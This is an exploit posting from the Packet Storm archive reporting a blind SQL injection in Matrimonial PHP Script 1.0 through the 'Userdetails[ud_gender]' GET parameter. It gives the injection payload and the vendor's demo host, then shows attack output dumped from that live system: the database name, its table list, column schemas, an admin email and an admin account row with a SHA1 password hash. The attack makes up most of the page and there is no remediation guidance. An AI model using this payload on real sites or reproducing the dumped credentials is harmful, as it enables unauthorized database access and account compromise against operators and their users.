what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Matrimonial PHP Script 1.0 SQL Injection

Matrimonial PHP Script 1.0 SQL Injection
Posted Aug 9, 2022
Authored by CraCkEr

Matrimonial PHP Script version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, php, sql injection
SHA-256 | dea1ba958ed1aef8b263c768dc1166b983798ae9571329778e696710463b676d

Matrimonial PHP Script 1.0 SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : uisort.com │ │ │
│ Vendor : Uisort Technologies Pvt. Ltd. │ │ │
│ Software : Matrimonial PHP Script v1.0 │ │ Matrimonial Script PHP tailored with │
│ Demo : stage.matrimic.in │ │ advanced features website │
│ Vuln Type: Remote SQL Injection │ │ & mobile apps from matrimic │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'Userdetails[ud_gender]' is vulnerable

---
Parameter: Userdetails[ud_gender] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Userdetails[ud_gender]=1 AND 2636=2636
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0


[INFO] fetching current database
[INFO] retrieved: stage_db_qa


[INFO] fetching number of tables for database 'stage_db_qa'
Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache |
| YiiLog |
| mc_admin |
| mc_blocklist |
| mc_caste |
| mc_city |
| mc_cms |
| mc_contact |
| mc_contact_history |
| mc_country |
| mc_currency |
| mc_deleteprofile |
| mc_education |
| mc_feedback |
| mc_gallery |
| mc_height |
| mc_horoscope |
| mc_import_jobs |
| mc_interest |
| mc_language |
| mc_message |
| mc_occupation |
| mc_partner |
| mc_plan |
| mc_profile_viewed |
| mc_religion |
| mc_searchlist |
| mc_settings |
| mc_shortlist |
| mc_sms_history |
| mc_state |
| mc_subcaste |
| mc_success_story |
| mc_toungue |
| mc_transaction |
| mc_user |
| mc_userdetails |
+--------------------+


[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| admin_email | varchar(32) |
| admin_id | int(11) |
| admin_name | varchar(32) |
| admin_status | int(11) |
+--------------+-------------+


[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1 | admin@mat\x81imic.com | Admin | 1 |
+----------+-----------------------+------------+--------------+


[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| api_token | varchar(255) |
| code | varchar(128) |
| device | varchar(32) |
| user_activecode | varchar(32) |
| user_activedate | datetime |
| user_activestatus | int(11) |
| user_android_device_id | varchar(255) |
| user_email | varchar(32) |
| user_id | int(11) |
| user_ios_device_id | varchar(255) |
| user_ipaddress | varchar(32( |
| user_lastlogin | datetime |
| user_mobile | bigint(20) |
| user_opensource | varchar(32) |
| user_password | varchar(255) |
| user_salt | varchar(64) |
| user_status | int(11) |
| user_type | int(11) |
| user_userid | int(11) |
| user_verified_token | varchar(255) |
+------------------------+--------------+


[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email | user_password | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1 | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 |
+---------+--------------------+------------------------------------------+-----------+-------------+
Possible Algorithms: SHA1


[-] Done
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close